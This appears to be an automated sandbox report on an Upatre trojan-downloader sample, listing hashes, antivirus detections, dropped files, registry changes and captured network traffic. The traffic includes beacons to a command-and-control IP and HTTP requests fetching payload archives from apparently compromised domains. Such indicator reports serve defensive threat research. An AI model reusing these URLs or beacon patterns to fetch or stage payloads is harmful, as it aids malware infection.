Analysis Date2015-07-30 12:21:20
MD58690d8d1d06ee542daa16ad95b291870
SHA17ec02730faad6adf956865ce150b1afa8188a36d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 05c17476dc7fab28004ba68af29bb1d7 sha1: 845d7c8fea7f587ae413af3c78ff341cba25fd9b size: 5632
Section.rdata md5: 26152a784fee026e4fe92cb200eb1ebb sha1: adc8d3b3d3ba885edf1780b730f64dbe4c84d187 size: 1024
Section.data md5: 7d23f1118c411b38b1a890c5bc38b5fa sha1: 6dfd596733c90d10f8ef201a1da3cd7a06c48e2d size: 512
Section.rsrc md5: d1e12d22cd17c0c13ed9968d81066ea0 sha1: b65c4ca121c9e78b66b626bbca4d084750087aee size: 11776
Timestamp2071-10-05 02:57:52
VersionLegalCopyright: Copyright by FASTER Inc.
InternalName: FASTER
FileVersion: Version 0.1.8
CompanyName: FASTER
FileDescription: FASTER company
OriginalFilename: FASTER
PEhashb21987e6d945d2cda9d5a11fa83dcd67d4262ab7
IMPhasha79387d1faab93d53469d6b3d5b2f4f3
AVRisingTrojan.DL.Win32.Upatre.aaq
AVCA (E-Trust Ino)Win32/Tnega.AWTW
AVF-SecureTrojan-Downloader:W32/Upatre.E
AVDr. WebTrojan.Upatre.87
AVClamAVWin.Trojan.Generickd-991
AVArcabit (arcavir)Trojan.GenericKD.1889168
AVBullGuardTrojan.GenericKD.1889168
AVPadvishno_virus
AVVirusBlokAda (vba32)TrojanDownloader.Upatre
AVCAT (quickheal)TrojanDwnldr.Upatre.AA4
AVTrend MicroTROJ_UPATRE.SM37
AVKasperskyTrojan-Downloader.Win32.Upatre.bja
AVZillya!Downloader.Upatre.Win32.28
AVEmsisoftTrojan.GenericKD.1889168
AVIkarusTrojan-Downloader.Win32.Upatre
AVFrisk (f-prot)W32/Trojan3.KZK
AVAuthentiumW32/Trojan.MNKK-0737
AVMalwareBytesTrojan.Downloader.upt
AVMicroWorld (escan)Trojan.GenericKD.1889168
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre
AVK7Trojan-Downloader ( 0048f6391 )
AVBitDefenderTrojan.GenericKD.1889168
AVFortinetW32/Kryptik.CLXC!tr
AVSymantecTrojan.Zbot
AVGrisoft (avg)Crypt3.ARXQ
AVEset (nod32)Win32/TrojanDownloader.Waski.A
AVAlwil (avast)Upatre-E [Trj]
AVAd-AwareTrojan.GenericKD.1889168
AVTwisterTrojanDldr.Upatre.bja.izog
AVAvira (antivir)TR/Crypt.ZPACK.100953
AVMcafeeDownloader-FSH!8690D8D1D06E

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\zstmx.exe
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\zstmx.exe"

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\zstmx.exe"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSmosaikglobal.com
Winsock DNSsurveying.nl
Winsock DNS188.165.198.52
Winsock DNSgaleriesylvia.net
Winsock DNSdsmfrance.com

Network Details:

DNSdsmfrance.com
Type: A
213.186.33.17
DNSsurveying.nl
Type: A
213.188.130.108
DNSgaleriesylvia.net
Type: A
81.88.57.68
DNSmosaikglobal.com
Type: A
HTTP GEThttp://188.165.198.52:31008/2909us/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0
HTTP GEThttp://188.165.198.52:31008/2909us/COMPUTER-XXXXXX/1/0/0/
User-Agent: Mozilla/5.0
HTTP GEThttp://188.165.198.52:31008/2909inst/COMPUTER-XXXXXX/1/0/0/
User-Agent: Mozilla/5.0
HTTP GEThttp://dsmfrance.com/css/2909uk5.rar
User-Agent: Mozilla/5.0
HTTP GEThttp://surveying.nl/script/2909uk5.rar
User-Agent: Mozilla/5.0
HTTP GEThttp://galeriesylvia.net/scripts/install4.tar
User-Agent: Mozilla/5.0
HTTP GEThttp://dsmfrance.com/css/2909uk5.rar
User-Agent: Mozilla/5.0
HTTP GEThttp://surveying.nl/script/2909uk5.rar
User-Agent: Mozilla/5.0
Flows TCP192.168.1.1:1031 ➝ 188.165.198.52:31008
Flows TCP192.168.1.1:1031 ➝ 188.165.198.52:31008
Flows TCP192.168.1.1:1032 ➝ 188.165.198.52:31008
Flows TCP192.168.1.1:1033 ➝ 188.165.198.52:31008
Flows TCP192.168.1.1:1034 ➝ 213.186.33.17:80
Flows TCP192.168.1.1:1035 ➝ 213.188.130.108:80
Flows TCP192.168.1.1:1036 ➝ 81.88.57.68:80
Flows TCP192.168.1.1:1037 ➝ 213.186.33.17:80
Flows TCP192.168.1.1:1038 ➝ 213.188.130.108:80

Raw Pcap
0x00000000 (00000)   47455420 2f323930 3975732f 434f4d50   GET /2909us/COMP
0x00000010 (00016)   55544552 2d585858 5858582f 302f3531   UTER-XXXXXX/0/51
0x00000020 (00032)   2d535033 2f302f20 48545450 2f312e31   -SP3/0/ HTTP/1.1
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000040 (00064)   7a696c6c 612f352e 300d0a48 6f73743a   zilla/5.0..Host:
0x00000050 (00080)   20313838 2e313635 2e313938 2e35323a    188.165.198.52:
0x00000060 (00096)   33313030 380d0a43 61636865 2d436f6e   31008..Cache-Con
0x00000070 (00112)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f323930 3975732f 434f4d50   GET /2909us/COMP
0x00000010 (00016)   55544552 2d585858 5858582f 312f302f   UTER-XXXXXX/1/0/
0x00000020 (00032)   302f2048 5454502f 312e310d 0a557365   0/ HTTP/1.1..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f352e30 0d0a486f 73743a20 3138382e   /5.0..Host: 188.
0x00000050 (00080)   3136352e 3139382e 35323a33 31303038   165.198.52:31008
0x00000060 (00096)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000070 (00112)   206e6f2d 63616368 650d0a0d 0a650d0a    no-cache....e..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f323930 39696e73 742f434f   GET /2909inst/CO
0x00000010 (00016)   4d505554 45522d58 58585858 582f312f   MPUTER-XXXXXX/1/
0x00000020 (00032)   302f302f 20485454 502f312e 310d0a55   0/0/ HTTP/1.1..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e300d0a 486f7374 3a203138   la/5.0..Host: 18
0x00000050 (00080)   382e3136 352e3139 382e3532 3a333130   8.165.198.52:310
0x00000060 (00096)   30380d0a 43616368 652d436f 6e74726f   08..Cache-Contro
0x00000070 (00112)   6c3a206e 6f2d6361 6368650d 0a0d0a0a   l: no-cache.....
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f637373 2f323930 39756b35   GET /css/2909uk5
0x00000010 (00016)   2e726172 20485454 502f312e 310d0a41   .rar HTTP/1.1..A
0x00000020 (00032)   63636570 743a2074 6578742f 2a2c2061   ccept: text/*, a
0x00000030 (00048)   70706c69 63617469 6f6e2f2a 0d0a5573   pplication/*..Us
0x00000040 (00064)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000050 (00080)   612f352e 300d0a48 6f73743a 2064736d   a/5.0..Host: dsm
0x00000060 (00096)   6672616e 63652e63 6f6d0d0a 43616368   france.com..Cach
0x00000070 (00112)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000080 (00128)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f736372 6970742f 32393039   GET /script/2909
0x00000010 (00016)   756b352e 72617220 48545450 2f312e31   uk5.rar HTTP/1.1
0x00000020 (00032)   0d0a4163 63657074 3a207465 78742f2a   ..Accept: text/*
0x00000030 (00048)   2c206170 706c6963 6174696f 6e2f2a0d   , application/*.
0x00000040 (00064)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000050 (00080)   696c6c61 2f352e30 0d0a486f 73743a20   illa/5.0..Host: 
0x00000060 (00096)   73757276 6579696e 672e6e6c 0d0a4361   surveying.nl..Ca
0x00000070 (00112)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000080 (00128)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f736372 69707473 2f696e73   GET /scripts/ins
0x00000010 (00016)   74616c6c 342e7461 72204854 54502f31   tall4.tar HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 74657874   .1..Accept: text
0x00000030 (00048)   2f2a2c20 6170706c 69636174 696f6e2f   /*, application/
0x00000040 (00064)   2a0d0a55 7365722d 4167656e 743a204d   *..User-Agent: M
0x00000050 (00080)   6f7a696c 6c612f35 2e300d0a 486f7374   ozilla/5.0..Host
0x00000060 (00096)   3a206761 6c657269 6573796c 7669612e   : galeriesylvia.
0x00000070 (00112)   6e65740d 0a436163 68652d43 6f6e7472   net..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f637373 2f323930 39756b35   GET /css/2909uk5
0x00000010 (00016)   2e726172 20485454 502f312e 310d0a41   .rar HTTP/1.1..A
0x00000020 (00032)   63636570 743a2074 6578742f 2a2c2061   ccept: text/*, a
0x00000030 (00048)   70706c69 63617469 6f6e2f2a 0d0a5573   pplication/*..Us
0x00000040 (00064)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000050 (00080)   612f352e 300d0a48 6f73743a 2064736d   a/5.0..Host: dsm
0x00000060 (00096)   6672616e 63652e63 6f6d0d0a 43616368   france.com..Cach
0x00000070 (00112)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000080 (00128)   6368650d 0a0d0a63 61636865 0d0a0d0a   che....cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f736372 6970742f 32393039   GET /script/2909
0x00000010 (00016)   756b352e 72617220 48545450 2f312e31   uk5.rar HTTP/1.1
0x00000020 (00032)   0d0a4163 63657074 3a207465 78742f2a   ..Accept: text/*
0x00000030 (00048)   2c206170 706c6963 6174696f 6e2f2a0d   , application/*.
0x00000040 (00064)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000050 (00080)   696c6c61 2f352e30 0d0a486f 73743a20   illa/5.0..Host: 
0x00000060 (00096)   73757276 6579696e 672e6e6c 0d0a4361   surveying.nl..Ca
0x00000070 (00112)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000080 (00128)   63616368 650d0a0d 0a636865 0d0a0d0a   cache....che....
0x00000090 (00144)                                         


Strings